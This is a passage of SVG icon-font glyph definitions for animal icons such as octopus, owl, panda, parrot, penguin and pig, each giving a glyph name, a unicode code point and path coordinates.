<glyph glyph-name="octopus-alt" horiz-adv-x="1000" unicode="&#xe870;" d="M934 317c-13 42-58 71-101 46-20-13-34-29-32-55 1-15 11-27 26-29 12-2 21 6 21 18 0 8-1 15-2 22 0 6 3 9 9 9 9 1 17-1 25-4 18-7 25-21 20-40-7-21-21-36-39-48-38-28-81-36-127-26-56 12-92 56-96 113-3 42 10 79 30 115 14 23 33 43 48 65 31 42 41 88 21 139-14 37-41 65-75 85-29 17-60 26-94 24-15 0-29-2-44-4-28-4-55-10-81-24-27-15-45-37-52-68-4-23-2-46 3-68 1-5 0-8-4-11-22-20-30-54-19-81 10-27 29-43 57-49 3-1 8 1 7-6-1-8-4-9-11-5-20 14-42 23-66 27-12 2-23 5-33 9-37 15-56 41-54 81 1 32 12 61 31 87 12 16 27 29 37 47 14 25 17 51 5 78-7 17-21 25-40 24-17-2-30-11-36-27-5-13 0-37 11-47 8-7 19-6 24 4 3 5 3 10 3 15 0 6 3 8 9 4 2-1 4-3 6-6 6-10 5-21-4-31-19-21-38-41-54-65-22-32-37-66-34-106 2-25 8-49 17-72 10-27 28-46 53-60 11-6 22-10 35-15-8-8-14-14-19-21-19-25-46-34-76-25-21 6-38 18-53 33-17 17-36 31-59 37-27 8-50-5-62-26-5-9-2-17 8-20 7-2 13-2 20-2 11 1 22 4 32 7 15 5 27 0 37-12 5-6 10-13 15-19 19-26 43-44 75-52 28-7 55-8 81 9 11 7 21 17 30 27 8 9 17 13 29 12 3-1 7 0 8-3 2-3-1-6-4-8-7-9-16-16-24-23-19-15-32-32-33-57 0-16 3-32 7-48 7-24 16-48 21-73 5-23-7-41-30-46-26-4-56 11-69 35-11 22-25 40-44 56-20 16-42 30-69 35-23 5-44-7-49-28-3-13 6-23 20-21 7 1 13 4 18 8 16 9 32 9 47-1 8-5 14-11 20-18 16-19 28-40 40-62 14-27 37-40 66-41 34 0 63 11 87 34 26 24 34 54 12 86-9 14-11 30-8 46 6 35 26 63 51 86 8 7 17 13 27 15 8 1 14-1 19-6 4-6 0-11-3-15-3-7-8-13-11-20-9-16-17-32-13-51 3-14 10-25 19-35 27-29 61-44 99-51 26-5 50-13 71-31 11-10 16-24 11-36-3-8-9-14-16-19-17-12-35-24-49-40-15-17-16-35-3-52 7-10 16-19 26-25 12-7 23-11 37-7 13 3 23 13 24 27 2 9-8 30-16 34-3 2-4 1-5-2-1-3-2-6-3-9-3-8-8-11-17-9-3 1-6 2-8 3-9 4-11 9-6 17 6 10 15 16 23 23 22 17 44 33 62 55 25 29 22 60-10 82-14 9-30 16-46 23-23 10-46 19-66 33-24 16-33 39-36 66-1 4-2 9 3 11 4 3 9 0 13-2 9-7 17-14 25-23 12-14 23-29 36-42 34-35 76-47 124-43 57 5 104 29 141 71 23 25 32 55 23 88z m-472 150c-4-1-7-2-11-3-3 0-6 0-11-1-21 1-38 11-49 31-11 22-9 43 6 61 14 19 33 25 55 22 9-1 9-2 6-11-10-30-8-60 8-88 4-7 2-9-4-11z m95-30c-52 0-93 42-92 94 0 51 42 93 93 93 51-1 93-43 93-94 0-51-42-93-94-93z m-1 137c-27 0-49-23-50-50 0-28 22-50 50-51 27 0 50 22 50 50 1 28-22 51-50 51z m14-51c-11 0-20 9-20 20 0 12 8 21 20 21 11 0 20-9 20-20 1-11-9-20-20-21z m-139 6c-8 0-14-6-14-14 0-8 6-14 14-14 9 0 15 6 15 14 0 8-7 14-15 14z" />
<glyph glyph-name="octopus" horiz-adv-x="1000" unicode="&#xe871;" d="M937 207c-6 27-23 46-49 55-25 8-48 4-69-13-14-12-24-28-32-44-8-16-16-33-25-48-12-21-35-32-54-27-21 6-32 22-35 43-4 27-7 54-11 82-1 10 4 16 14 20 15 5 28 13 39 23 23 21 34 49 48 75 12 25 30 44 55 56 19 9 36 7 50-7 14-13 20-29 13-47-2-7-6-13-10-17 4 5 6 11 6 18 0 16-13 28-28 28s-29-13-29-28c0-16 13-29 29-29h0c11-1 21 2 29 11 16 16 19 34 11 53-8 22-24 37-48 40-23 2-42-6-60-18-18-13-32-28-46-45-24-26-50-48-88-57 7 11 17 15 23 24 19 27 23 59 26 90 3 28 6 55 25 77 19 22 50 18 63-7-5 5-12 9-21 9-15 0-28-13-28-28 0-16 13-29 28-29s29 13 29 29c0 1-1 3-1 4-3 36-31 56-62 45-15-6-26-17-34-31-13-19-19-42-24-64-5-22-13-43-29-60-11-10-23-16-40-14 18 40 37 78 48 120 20 74 8 140-48 194-29 28-63 45-102 44-39 1-73-16-102-44-56-54-68-120-48-194 11-42 29-80 48-120-17-2-29 4-40 14-16 17-24 38-29 60-5 22-11 45-24 64-8 14-19 25-34 31-31 11-59-9-62-45-1-1-1-3-1-4 0-16 13-29 29-29s28 13 28 29c0 15-13 28-28 28-9 0-16-3-21-9 13 25 44 29 63 7 19-22 22-49 25-77 3-31 7-63 26-90 6-9 16-13 22-24-37 9-64 31-87 57-14 17-28 32-46 45-18 12-38 20-60 18-25-3-40-18-48-40-8-19-5-37 11-53 8-9 18-12 29-11h0c16 0 29 13 29 29 0 16-13 28-29 28s-28-13-28-28c0-7 2-13 6-18-4 4-8 10-10 17-7 18-1 34 12 47 15 14 32 16 51 7 25-12 43-31 55-56 14-26 25-54 47-75 12-11 25-18 40-23 10-4 15-10 14-20-4-28-7-55-11-82-4-21-14-37-35-43-19-5-42 6-54 26-9 16-17 33-25 49-9 16-18 32-32 44-21 17-44 21-69 13-26-9-43-28-49-55-7-36 31-72 63-61l0 0c12 3 21 14 21 28 0 15-12 28-28 28s-29-13-29-28c0-5 2-10 4-14-21 17-23 43-7 63 20 24 51 29 73 11 12-10 19-23 25-37 9-21 15-43 26-62 36-60 114-61 150-1 8 13 14 29 18 44 2 8 5 15 7 24 6-5 4-10 3-15-5-43 0-86 10-128 11-45-34-87-78-73-17 5-30 22-32 39 4-10 14-18 26-18 15 0 28 13 28 29v0c0 1 0 2 0 3-2 14-14 25-28 25-4 0-7-1-10-2-19-6-30-26-25-47 8-36 43-56 81-47 40 10 66 43 71 88 4 28-3 56 3 84 1 7 2 13 3 20 9 37 27 53 62 53 34 0 53-16 61-53 2-7 2-13 3-20 6-28 0-56 3-84 5-45 32-78 71-88 38-9 73 11 81 47 5 21-6 41-24 47-4 1-7 2-10 2-15 0-27-11-29-25 0-1 0-2 0-3v0c0-16 13-29 29-29 11 0 22 8 26 18-3-17-16-34-33-39-44-14-89 28-78 73 10 42 15 85 10 128-1 5-2 10 3 15 3-9 5-16 7-24 4-16 10-31 18-44 37-60 115-59 150 1 11 19 17 41 26 62 6 14 13 27 25 37 22 18 54 13 73-11 17-20 14-46-7-63 3 4 4 9 4 14 0 15-13 28-29 28s-28-13-28-28c0-14 9-25 21-28l1 0c32-11 70 25 63 61z m-520 249c-9 10-15 21-20 37 15-17 30-28 50-31-10-17-18-19-30-6z m166 0c-11-13-20-11-29 6 19 3 34 14 49 31-5-16-11-27-20-37z" />
<glyph glyph-name="owl" horiz-adv-x="1000" unicode="&#xe872;" d="M282 107c-78 64-106 142-100 234 3 56 24 107 69 144 11 9 7 17 2 26-28 47-24 93-1 140 20 41 23 86 24 135 150-114 298-114 450 2-7-68 17-123 37-179 12-34 1-65-15-95-4-10-13-18 0-28 81-62 89-194 45-287-16-35-40-64-74-91 22 69 37 133 15 200-1-40-2-80-13-119-4-12-6-24-12-34-24-43-48-84-40-138 5-29-16-49-49-54-42-6-86-8-115-48-5-6-10 0-14 5-21 26-51 34-82 39-72 9-88 29-79 102 1 9 6 17-1 26-50 66-67 141-62 223-24-67-8-132 15-203z m329 380c48 0 84 35 85 82 1 46-37 84-83 85-45 1-85-38-85-83 0-47 36-84 83-84z m-307 83c0-47 37-84 83-84 47 0 85 38 85 84 1 44-39 84-84 84-46 0-84-37-84-84z m195-57c-17-1-31-10-29-28 1-19 13-35 30-45 6-4 33 34 31 46-2 17-13 26-32 27z m76-170c-1-27 14-38 35-40 23-1 38 12 43 45-28-31-52-30-78-5z m-225-3c4-25 18-39 42-36 20 2 33 13 33 40-26-27-50-25-75-4z m126-80c-29-32-54-30-82-4 5-28 17-40 39-41 23-1 36 13 43 45z m51-4c3-29 17-41 39-41 23 0 36 14 40 43-27-29-52-29-79-2z m9 85c-24-25-48-21-74 4 5-28 18-41 38-41 21-1 33 14 36 37z m82-243c12 9 14 21 11 34-1 8-5 21-14 19-15-4-3-15-2-22 1-10 3-20 5-31z m-236 0c2 13 4 22 5 30 1 8 12 19-1 22-10 3-13-10-15-18-5-13 0-23 11-34z m209 2c12 14 10 27 5 40-1 6-3 13-11 11-9-3-6-9-4-15 3-11 6-22 10-36z m-234 45c-24-22-23-37 1-55-6 23-6 23-1 55z m296 428c1-21-17-40-39-41-21-1-40 17-39 39 0 24 14 37 36 39 22 2 41-15 42-37z m-267 37c22 1 40-16 40-38 0-22-19-41-40-40-23 2-37 15-39 38-2 21 16 40 39 40z" />
<glyph glyph-name="panda-face" horiz-adv-x="1000" unicode="&#xe873;" d="M596 224c-14 7-17-6-21-16-10-20-33-27-50-16-11 7-16 14-3 24 12 9 23 19 34 30 10 9 8 16-5 21-17 8-35 12-54 13-19-1-37-5-54-12-15-6-18-13-6-24 11-10 21-20 32-28 13-10 8-18-2-24-19-12-40-5-51 18-4 9-8 19-19 14-12-4-10-15-7-25 11-32 44-49 78-37 20 6 37 6 56-1 33-11 64 4 76 35 4 9 9 21-4 28z m-124 161c1 71-47 111-98 91-50-20-82-82-69-135 14-56 63-77 112-47 37 23 53 58 55 91z m102 91c-32-11-46-39-48-72-3-31 7-58 24-82 22-33 61-49 91-39 33 10 53 41 53 87-1 27-11 55-31 78-24 26-54 40-89 28z m363 84c-3 30-12 60-33 84-43 47-113 62-181 34-36-15-69-15-106-1-79 32-160 31-239 2-37-14-70-15-106-1-57 22-113 20-162-19-51-40-62-114-29-178 13-25 29-48 51-65 13-10 16-21 15-37-13-178 100-330 274-371 193-46 397 95 421 292 0 4 1 8 2 11 4 28-5 58 4 83 8 25 38 38 54 61 18 28 31 54 35 87 1 3 0 14 0 18z m-140-229c-4-154-148-288-304-284-173 5-304 142-300 314 5 162 147 297 307 291 177-6 303-142 297-321z" />
<glyph glyph-name="panda" horiz-adv-x="1000" unicode="&#xe874;" d="M589 175c69 69 112 148 109 249-2 76-30 136-88 183-5 4-10 7-18 8 1-11 5-19 8-27 5-10 10-20 8-32-3-28-15-50-36-67-27-23-58-34-91-41-11-2-15-6-18-16-4-14-10-27-23-34-39-22-85-26-118 16-13 15-27 21-45 21-1 0-2 0-2 0-30 5-56 15-73 42-17 29-43 39-74 36-54-5-81-55-57-103 8-15 19-28 34-38 43-28 88-51 139-61 28-5 56-7 84-11 20-2 40-5 58-15 22-11 26-28 10-48-9-11-21-20-34-28-22-12-45-22-68-33-14-6-28-13-39-24-14-12-25-26-21-46 4-20 21-29 38-33 70-18 138-14 202 19 43 21 82 49 115 83z m246 21c-25 33-64 45-98 29-38-19-62-48-64-91-3-40-23-61-63-65-16-2-32 0-48 4-18 5-37 6-57 4-37-3-56-32-44-67 10-34 42-57 80-60 39-2 77-4 116-9 28-4 56-13 86-10 14-1 28 0 42 1 55 4 85 37 86 93 1 43-6 85-16 127-3 16-10 30-20 44z m-591 441c42 12 67 43 85 81 8 16 0 31-15 41-10 7-22 10-31 10-45 0-83-33-94-79-8-37 18-64 55-53z m669-349c-51 110-132 193-228 265-4 3-8 5-13 8 2-5 4-9 7-12 24-29 53-54 79-81 52-53 96-112 128-180 27-56 33-115 18-175-7-33-13-66-21-101 4 4 5 6 7 8 49 85 66 174 23 268z m-403 388c13-2 20-12 28-21 17-19 41-15 51 9 5 11 5 24 5 34-1 46-13 63-50 70-10 2-21 2-31 0-28-4-43-21-44-45-1-23 16-42 41-47z m-194-85c-33-7-65-46-65-82 0-3 0-7 1-12 3-12 9-22 22-26 13-3 28-4 37 8 16 22 33 44 42 70 10 27-9 47-37 42z m3-44c-9 1-13 7-13 15-1 9 5 14 13 14 9 0 14-6 15-15-1-8-5-14-15-14z m138 50c-20 3-32-9-32-29 1-10 4-18 8-27 10-19 26-35 32-56 2-5 6-7 12-5 15 5 37 36 37 53 0 30-27 61-57 64z m0-46c-9 1-13 7-13 16 0 9 6 12 14 13 9-1 14-6 14-15 0-9-6-14-15-14z m-78-159c2-1 3-1 5-1 11 4 32 28 33 39 1 11-4 19-14 17-12-2-24-5-33 1-13-1-18-7-18-17 0-12 16-35 27-39z m-219 125c1 43 14 81 46 113-10 1-16-1-20-6-16-19-23-31-29-45-8-17-8-34-7-52 1-4 2-8 10-10z m189 189c34 15 67 19 102 2 4-2 9-5 15-2-4 8-11 12-18 14-35 13-70 11-103-5-5-3-15-6-12-12 3-7 11 0 16 3z" />
<glyph glyph-name="panther" horiz-adv-x="1000" unicode="&#xe875;" d="M528-60c7 44 9 85 6 126-3 56-13 111-52 156-6 7-14 12-22 21 78-7 147-33 218-57-85 58-180 89-285 99 26 17 44 36 59 59 2 4 9 4 14 6 62 23 108 63 126 129 1 4 1 7 2 11 0 3 0 6-1 10-13-37-35-66-65-90-15-12-31-21-50-27-10-4-15-4-16 10-2 27-15 49-39 68 5-13 10-22 13-31 12-39 6-73-26-100-27-24-54-49-81-73-21-19-21-32 0-51 2-3 5-5 9-8-16-1-28 4-41 9-38 14-72 34-98 65-5 6-10 12-7 20 2 8 10 4 16 5 46 8 87 25 119 59 22 24 22 49 1 76-10 13-22 24-32 36 27-11 45-35 69-52-7 19-22 32-37 44-37 31-77 56-127 59-29 2-55-4-77-23-9-9-14-6-18 5-1 3-2 7-1 10 7 22-8 32-23 40-13 8-20 18-20 33 1 4-2 12 7 11 5 0 10-2 11-10 0-9 3-19 13-25 0 5-1 9-1 13-1 11 1 18 16 15 10-3 21-3 32-4-1 5-6 5-9 6-18 8-36 17-53 27-16 10-17 19 2 26 19 6 36 20 58 18 11-1 22 5 32 10 35 17 72 29 99 60 26 31 61 31 97 26 61-8 119-24 175-47 9-4 17-5 27-2 55 13 109 7 162-13 8-3 15-8 23-12 8-5 8-11 1-18-22-23-48-38-81-42 1-7 7-8 11-11 71-48 140-98 202-158 13-12 24-26 37-38 15-15 16-32 12-52-13-64-48-117-90-166-88-103-195-182-309-254-2-1-4-2-8-4z m-47 686c-46 12-94 12-141 6-26-3-51-14-77-2-14 6-24-2-35-12 38-3 69-16 92-45 24-30 27-64 25-100 9 25 7 50 4 76 37-7 69-23 101-39-28 21-58 37-91 47-12 4-17 11-22 21-2 7-1 9 5 9 17-1 34 0 50-2 26-3 52-9 77-15-41 17-84 28-129 26-14 0-22 5-30 16 14 6 28 9 42 11 43 7 86 6 129 3z m108 10c20 16 40 26 61 33 21 8 43 9 66 11-51 14-128-14-152-54 32-8 71-5 90 7-21-3-42-6-65 3z m-218 47c-22-6-42-1-63 2-17 3-33-12-34-29 13 4 24 10 35 17 2 1 5 5 8 2 3-2 2-5 1-8-2-7-4-13-6-20 25 5 44 15 59 36z m-140-17c-38-18-76-34-121-39 8-5 13-11 22-8 35 11 68 26 99 47z m58-217c-25 24-50 39-82 42-15 2-20-3-22-18-1-18 5-34 14-49-20 3-57 41-60 60-1 10 8 12 14 15 34 16 84 8 113-19 9-8 17-16 23-31z m-65-56c17-57 41-68 104-17-6-13-13-20-22-27-19-16-42-25-66-33-11-4-17 3-19 12-7 22-6 43 3 65z" />
<glyph glyph-name="parrot-lip" horiz-adv-x="1000" unicode="&#xe876;" d="M894 392c-17 101-66 184-138 255-3 2-7 4-10 5-18 1-36 2-54 2-50-1-86-25-106-70-16-36-29-73-43-110-19-50-42-97-82-133-14-14-30-25-45-38 2 0 5-1 7-2 50-13 98-29 143-53 40-22 76-49 101-88 34-54 38-112 24-173-5-25-14-49-21-74 52 38 98 80 135 132 77 103 111 219 89 347z m-543-74c3-1 7 0 10 1 26 11 50 26 71 45 38 34 59 78 77 125 15 38 28 76 45 113 17 38 45 67 86 80 19 6 39 8 58 12-2 1-4 3-6 4-41 28-85 50-132 65-62 20-126 30-191 22-67-8-126-31-176-77-66-62-101-136-92-228 6-70 59-128 128-141 41-7 81-14 122-21z m25 252c46 0 84-38 84-85-1-45-36-83-85-83-46-1-84 38-84 84 0 46 39 85 85 84z m201-482l-2 5c-17 37-24 76-16 117l-34 17c-2-10-4-19-5-28-4-38 2-76 18-114-62 37-100 88-114 157-4 22-3 23-26 27-50 10-100 19-149 29-25 5-50 12-74 18 0-1-1-3-1-5-2-45 8-87 29-126 72-133 229-197 373-152 16 5 32 13 51 20-4 2-5 3-7 3-22 0-35 12-43 32z" />
<glyph glyph-name="parrot" horiz-adv-x="1000" unicode="&#xe877;" d="M329 636c24-15 47-26 72-34 87-26 171-61 249-108 3-2 6-5 11-4-8 19-9 40-4 59 3 10 0 15-9 19-113 62-233 100-359 120 8-37 40-52 40-52z m309-294c42-34 40-61-6-80 20-14 43-23 64-34 5-2 7 2 9 4 29 30 39 89 17 122-12 16-17 37-13 56 4 20-4 30-18 43-20 19-41 36-65 50-36 20-73 37-111 54-58 26-122 37-181 70 1-28 14-46 33-62 23-21 51-35 79-47 63-27 125-56 184-91 9-5 18-11 26-17 13-10 17-24 11-40-5-14-16-22-29-28z m3-181c-23 26-45 52-59 84-5 11-9 23-8 36 1 9 4 13 14 7 9-6 18-12 28-16 15-8 33-1 43 14 9 15 6 31-9 42-16 10-32 20-49 29-23 13-48 7-65-13-11-14-19-29-24-46-10-40-6-80 7-120 2-6 6-8 10-10 27-16 53-34 78-53 38-29 71-61 100-103 7 23 2 43-6 62-14 33-36 61-60 87z m228 231c5-14 8-27 10-39 2-13 2-27 1-40-2-37-23-60-55-62-16-1-32 4-46 12-19 11-40 7-54-10-7-9-13-18-20-28 5-2 9-4 13-6 27-12 53-25 76-43 23-17 37-39 33-69-2-12-7-23-12-36 101 40 188 191 54 321z m8-162c-7 6-5 13 0 19 6 7 12 4 19-1 1 12-4 20-10 27-3 5-4 9 1 12 4 4 8 2 12-2 9-10 9-44 0-54-7-7-15-7-22-1z m-558 100c89 66 185 70 286 30 8-3 16-7 24-8 14-1 24 8 29 23 4 13 0 22-12 29-51 28-105 42-163 42-106-1-191-44-257-126-10-12-19-26-23-41-7-23 1-39 23-47 9-4 14-2 18 7 18 36 43 67 75 91z m-70-46c-9-11-14-24-16-42-4 19 3 32 11 44 66 94 156 135 270 124 38-4 73-16 105-35-22 7-43 15-66 20-123 22-224-15-304-111z m237 169c43 1 84-9 125-23l-11 6c-45 26-92 49-140 69-12 5-23 6-35 4-70-12-134-36-187-84-34-29-65-61-88-100-9-15-16-30-17-48-1-18 7-29 24-35 10-3 14-2 19 9 62 130 165 198 310 202z m-305-151c-11-16-14-26-18-48-4 21 4 37 14 53 50 85 124 139 220 162 31 7 63 9 96 7 5 0 11-2 17-2-47-1-93-8-138-24-80-28-143-78-191-148z m515 159c12-10 24-19 36-29 29-22 55-47 65-83 5-22 7-43-9-61-12-13-12-13 5-21 5-2 11-4 17-5 30-6 51 8 58 38 2 9 2 19 2 27 0 45-15 86-46 116-45 42-96 76-148 110-6 4-8 2-9-4-8-35 0-65 29-88z m-435-8c51 34 107 55 171 64-26 14-49 26-69 44-4 4-8 1-12 0-113-35-201-103-263-205-13-21-23-44-25-69-2-21 7-37 24-42 9-2 14-1 18 9 30 83 82 150 156 199z m-148-137c-11-18-20-35-19-56-7 13-2 26 3 38 12 32 30 62 52 89 57 72 130 118 219 140 2 1 5 1 8 0-3-2-6-3-9-4-60-21-114-51-161-94-37-33-68-71-93-113z m390 2c5-1 8-1 10 4 10 19 22 36 43 47-15 5-28 7-41 8-90 9-166-17-225-88-7-9-13-19-17-29-7-21 1-37 21-46 7-3 11-3 15 5 45 71 110 105 194 99z m-204-95c-4 16 3 29 11 41 27 36 62 58 104 71 31 10 63 11 95 4-36 0-70-5-104-18-29-12-55-28-78-49-14-14-26-29-28-49z m200 38c0 9 2 18 3 27 0 8 9 17 3 22-5 4-16 2-24 2-29 0-56-6-82-19-24-12-44-29-55-53-10-21-4-39 14-50 7-5 10-4 14 3 29 40 68 59 117 59 7 0 10 1 10 9z m-136-65c-3 12 1 23 9 34 22 30 55 42 91 46 8 0 16 0 25 0-52-13-105-21-125-80z m248 67c-8 5-17 9-27 15 0-18 7-32 15-45 19-32 43-61 71-86 20-18 39-36 60-55 4 20-2 37-11 52-26 48-64 86-108 119z m-121-18c-22 1-42-3-61-12-17-7-29-18-31-38-1-19 10-31 25-40-6 41 26 64 73 51-33-4-68-7-73-51 5-1 7 3 9 6 7 8 15 14 24 18 17 8 35 7 54 1-5 21-10 40-11 60 0 6-6 5-9 5z m299 65c1 5 3 9-5 13-17 5-24 28-12 41 8 9 1 14-3 18-6 7-11-1-14-4-8-7-10-17-11-25 0-27 13-46 34-50 6-1 9 0 11 7z m-50-2c0-16-5-29-8-43 11 8 23 8 36 11-10 10-19 20-28 32z" />
<glyph glyph-name="paw" horiz-adv-x="1000" unicode="&#xe878;" d="M713 198c-41 29-66 64-78 112-16 63-78 107-143 106-67-1-122-45-139-109-12-43-29-81-71-105-49-28-64-78-65-116-1-97 39-151 110-161 36-5 71 6 104 20 50 21 99 22 147-4 8-4 16-7 23-10 41-17 79-12 115 14 71 51 109 176-3 253z m-31 275c62 70 81 152 48 242-26 72-95 85-149 31-46-46-63-104-65-167-1-27 4-53 14-77 31-73 99-88 152-29z m-357-7c50-47 111-35 141 26 13 28 18 57 17 87-1 66-20 126-70 172-49 46-110 34-140-27-11-21-16-44-17-67-4-73 14-139 69-191z m609 22c-10 47-49 72-96 64-83-16-164-123-162-214 0-5 0-10 1-15 9-69 52-100 114-80 91 28 164 153 143 245z m-611-157c0 82-38 148-104 196-24 18-52 30-83 26-49-5-76-45-73-118 9-73 46-144 128-185 74-37 132 6 132 81z" />
<glyph glyph-name="pelican" horiz-adv-x="1000" unicode="&#xe879;" d="M934 637s4 7 3 9c-4 10-19 12-29 13-51 6-102 10-154 14-96 8-191 16-287 25-10 1-22 5-27 12-34 44-90 63-146 48-50-13-83-50-90-108-6-48-8-96-11-145-2-17-2-34-3-56 59 20 112 11 166-6 52-16 105-30 154-53-8-4-15-4-21-2-40 11-80 23-120 33-31 8-62 17-93 19-100 3-209-104-213-208-1-36 0-71 0-106v-103c12 9 16 14 21 16 23 10 45 24 69 28 31 4 64 2 97-1 50-4 55-2 52-57 0-6 0-11 1-16 0-22-6-36-31-37-9-1-23-4-25-13 0-2 4-6 4-6h288c-5 36-23 48-64 42-38-5-75-10-112-16-18-3-27 3-26 22 1 12 1 24 2 37 1 30 2 31 33 31 57 0 113 0 169-1 47 0 88 15 122 50 44 47 88 95 138 136 61 52 48 167-49 192-104 27-207 65-309 98-7 3-14 7-20 11l3 6c7-1 15-2 22-4 111-32 222-64 333-96 42-12 63-2 83 36 18 32 37 64 54 97 5 8 7 17 12 29-159 14-315 20-469 35l0 12 473-17z m-554 18c-10 0-19 9-19 19 0 11 9 20 19 20s20-9 20-20c0-10-9-19-20-19z" />
<glyph glyph-name="penguin" horiz-adv-x="1000" unicode="&#xe87a;" d="M692 510c-24 20-48 40-71 61-11 11-22 23-31 36-13 22-5 39 20 43 15 3 31 3 46 4 27 1 54 2 81 3-5 29-16 39-56 42-42 4-75 16-100 55-22 33-61 40-99 28-35-10-52-38-56-73-2-16-3-32-1-48 3-31-7-57-29-78-27-26-57-49-84-75-14-14-30-31-37-50-15-39-16-80-5-121 3-10 9-19 13-29l6-12c4 13 9 40 14 53 10 26 21 52 34 76 3 7 18 16 26 11 9-4 4-19 5-29 0-3-3-7-4-10-14-41-30-82-42-123-31-101-25-197 47-282 12-14 7-27-9-35-9-5-20-8-29-13-12-6-24-12-35-19l-17-9c30 0 81 1 112 0 15 0 25 5 35 17 7 9 20 17 31 19 23 3 47 4 70 0 15-2 29-13 43-21 8-5 15-17 23-17 33-2 74-1 107-1h16l-20 11c-17 8-32 17-49 23-33 13-38 24-15 51 46 55 61 120 57 190-4 64-19 126-42 186-4 10-9 20-10 31 0 8-2 22 6 26 8 5 21-2 27-8 10-11 18-24 23-38 7-20 9-42 14-62 2-6 5-22 8-28 5 5 14 21 14 26 4 39 8 78 7 117-1 30-21 53-44 72z m-150 232c10 0 18-8 18-17s-8-18-18-18-17 8-17 18 7 17 17 17z m84-650c-11-52-50-76-101-79-24-1-49 1-72 6-54 13-85 55-92 120-2 10-2 20-2 30 2 46 14 87 26 129 17 56 35 112 53 167 6 17 13 33 20 49 9 19 25 32 47 31 21-1 38-13 45-33 21-63 42-126 60-189 11-40 22-82 25-123 3-35-2-72-9-108z" />
<glyph glyph-name="pig-face" horiz-adv-x="1000" unicode="&#xe87b;" d="M937 616c-3 5-8 3-12 3-5 0-9-1-13-1-27 0-52 8-76 16-30 10-60 12-90-1-24-10-40-29-54-50-3-6-6-7-12-4-22 8-44 16-67 22-48 13-97 20-147 15-46-5-90-17-134-33-6-2-13-7-18-6-6 1-8 10-13 15-5 6-10 12-15 18-17 18-37 29-63 31-22 2-43-1-63-8-28-10-57-17-87-14-10 1-13-3-8-13 15-26 28-52 40-78 6-13 10-27 18-39 17-28 40-45 75-40 5 0 10 1 16 1-3-7-6-13-8-18-19-53-18-107-5-160 22-92 76-157 165-191 61-22 125-28 189-19 50 6 96 22 138 50 96 61 129 194 111 285-4 18-10 35-18 53 5-1 8-1 11-1 10 0 20-2 30 0 28 7 45 27 56 51 6 13 11 25 17 38 10 23 22 45 34 67 2 3 5 7 3 11z m-626-200c-2 1-3 3-5 5-3 4-6 8-12 2-3-2-7-1-10 2-3 3-3 6-2 10 19 53 75 69 121 30 3-3 4-6 3-10-3-5-7-7-11-6-8 2-6-5-6-7-10-35-50-48-78-26z m227-250c-13-3-25-4-37-3-19-1-37 1-54 7-39 14-62 47-64 91-3 55 34 98 92 105 26 3 51 2 76-6 45-16 69-54 66-102-3-48-31-81-79-92z m177 259c-3-3-8-4-12-1-3 3-4 3-6 0-13-16-30-22-50-17-21 5-33 20-37 41 0 0 0 1-1 2-2-1-4-1-7-1-4 0-7 2-8 6-2 4 0 7 3 10 35 31 83 31 110-10 4-6 7-12 10-19 2-4 3-8-2-11z m-273-122c-12-1-19-10-19-24 1-13 2-26 4-39 2-12 12-19 23-18 11 2 18 11 17 23-1 12-2 25-4 37-1 14-9 21-21 21z m117-1c-13 1-21-6-22-20-2-12-3-25-4-37-1-12 5-21 16-23 12-2 22 6 24 18 1 13 2 26 4 39 0 13-7 23-18 23z m-194 162c2-19-4-30-18-34-14-3-25 4-31 23-10-9-10-11-3-21 9-11 24-16 37-13 15 4 25 16 27 31 1 10 0 12-12 14z m319-11c-8-19-17-26-32-22-5 1-9 4-13 8-6 8-6 17-4 26-13-4-14-5-12-16 2-15 13-27 27-30 15-3 27 2 37 14 7 9 7 11-3 20z" />
<glyph glyph-name="pig" horiz-adv-x="1000" unicode="&#xe87c;" d="M522 701c17-3 22-19 32-28 9-8 8-7 32-7 19 0 30 4 44-12 11-11 27-21 39-33 9-10 22-7 31 4 12 16 23 32 35 48 16 23 35 43 63 53 14 6 25 17 32 31 4 9 5 25 20 23 15-2 18-17 21-29 9-41 18-83 26-124 7-41 11-82 1-124-9-36-30-66-50-96-8-12-21-15-34-13-10 2-18 5-27 7-24 5-32 0-33-25-1-34 4-66 18-97 24-54 41-111 35-172-8-80-51-134-124-163-77-32-158-35-240-29-33 2-65 6-96 15-126 36-186 146-151 273 14 49 36 96 41 147 1 12 2 24-1 36-4 15-11 18-28 15-72-16-108 7-112 81-1 26 1 52 8 76 15 53 14 106 5 159-4 23 2 44 17 62 8 11 20 12 26-1 18-36 48-60 79-84 21-16 36-38 52-59 19-26 30-24 52-1 12 12 24 34 50 24 2-1 6 0 7 1 15 24 32 7 49 3 5-1 11-5 14-3 6 4 3 11 1 16-3 7-7 17 0 22 8 5 16-2 23-7 10-6 19-13 30-19 5-4 12-9 18-3 8 6-1 12-3 17-2 5-10 14-2 16z m-18-634c13 1 27 1 40 4 26 7 47 20 53 49 12 56-23 111-80 125-48 11-100-24-114-78-11-46 11-87 55-96 15-3 30-3 46-4z m-134 341c-10-1-24 0-23-13 2-22 23-18 37-22 6-2 14-2 12 7-3 14-5 30-26 28z m262 0c-18 1-24-9-25-24-1-8 1-14 10-11 15 4 36 0 38 22 1 11-13 13-23 13z m-156-254c2-11-6-18-18-17-8 1-16 4-14 14 2 10 9 18 20 19 10 1 11-9 12-16z m61 17c10 1 18-9 20-20 1-9-6-13-14-14-11-1-16 5-18 14-2 10 3 19 12 20z" />
<glyph glyph-name="pigeon-1" horiz-adv-x="1000" unicode="&#xe87d;" d="M929 232c-3 1-7 3-11 3-13 2-20 9-25 21-11 23-26 42-53 46-33 6-57-7-77-32-3-5-8-13-15-7-7 5-2 12 2 17 19 26 45 40 78 38 10 0 15 4 18 13 7 22 13 44 17 66 6 46 8 92 22 136 8 26 15 52 23 78 2 6 5 12-1 17-5 5-12 2-18-1-8-3-15-9-21-15-10-10-18-22-25-35-3-5-5-10-11-11-20-7-31-23-41-41-7-14-12-29-29-34-6-3-10-11-14-17-6-10-10-21-13-32-2-5-4-11-10-12-20-5-27-21-33-39-3-9-6-18-14-25-7-6-7-12-2-20 13-23 22-48 29-73 8-32-1-59-24-81-4-4-8-6-13-8-3-2-7-1-10 3-1 3-1 6 2 8 2 3 4 5 7 7 20 17 27 38 23 64-7 50-33 91-70 123-32 27-59 57-85 90l-1 2c-39 39-75 82-105 129-10 15-20 31-30 46-3 5-6 10-13 9-6-1-8-7-10-12-3-7-4-13-4-20 0-38 14-71 30-104 4-7 7-14 4-22-11-29-4-54 12-78 4-5 7-10 6-15-5-29 6-52 23-73 4-4 7-9 6-16-2-19 4-35 16-48 6-7 7-14 1-21-9-12-11-24-5-38 2-4 4-10-2-13-7-3-10 3-13 8-6 12-8 26-2 39 